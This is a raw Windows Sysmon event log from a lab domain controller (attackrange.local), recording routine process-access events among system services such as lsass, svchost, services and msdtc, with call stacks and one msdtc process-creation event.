13:11:46.816{08A6967A-4286-6000-0B00-000000009A01}8521096C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003198Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.534{08A6967A-4286-6000-0A00-000000009A01}844924C:\Windows\system32\services.exe{08A6967A-4312-6000-9C00-000000009A01}3024C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003197Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.518{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4312-6000-9C00-000000009A01}3024C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003196Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.456{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4312-6000-9C00-000000009A01}3024C:\Windows\system32\sppsvc.exe0x103800C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003195Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.456{08A6967A-4286-6000-0A00-000000009A01}8441220C:\Windows\system32\services.exe{08A6967A-4312-6000-9C00-000000009A01}3024C:\Windows\system32\sppsvc.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+316d|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003194Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.393{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003193Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.393{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003192Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.393{08A6967A-4286-6000-0B00-000000009A01}8521096C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003191Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.315{08A6967A-4286-6000-0B00-000000009A01}8521096C:\Windows\system32\lsass.exe{08A6967A-4312-6000-9B00-000000009A01}4412C:\Windows\System32\msdtc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003190Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.315{08A6967A-4286-6000-0B00-000000009A01}8521096C:\Windows\system32\lsass.exe{08A6967A-4312-6000-9B00-000000009A01}4412C:\Windows\System32\msdtc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003189Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.252{08A6967A-4286-6000-0A00-000000009A01}844924C:\Windows\system32\services.exe{08A6967A-4312-6000-9B00-000000009A01}4412C:\Windows\System32\msdtc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003188Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.142{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003187Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.142{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003186Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.142{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003185Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.142{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003184Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.142{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003183Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.142{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003182Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.142{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003181Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.142{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003180Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.142{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003179Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.142{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4312-6000-9B00-000000009A01}4412C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003178Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.142{08A6967A-4286-6000-0A00-000000009A01}8441220C:\Windows\system32\services.exe{08A6967A-4312-6000-9B00-000000009A01}4412C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+316d|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003177Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.147{08A6967A-4312-6000-9B00-000000009A01}4412C:\Windows\System32\msdtc.exe2001.12.10941.16384 (rs1_release.160715-1616)Microsoft Distributed Transaction Coordinator ServiceMicrosoft® Windows® Operating SystemMicrosoft CorporationMSDTC.EXEC:\Windows\System32\msdtc.exeC:\Windows\system32\NT AUTHORITY\NETWORK SERVICE{08A6967A-4288-6000-E403-000000000000}0x3e40SystemMD5=308F08347923DEEDE7BC03EC7D485841,SHA256=72DB45CA11FE635DF9F8273C38CBEFB8DF5362ADA0CBF6D2B1E570365DC700C0,IMPHASH=D02F3DF332409C5D3F34BA2D38FC4ED4{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000003176Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.142{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003175Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.142{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003174Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.142{08A6967A-4286-6000-0B00-000000009A01}8521096C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003173Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 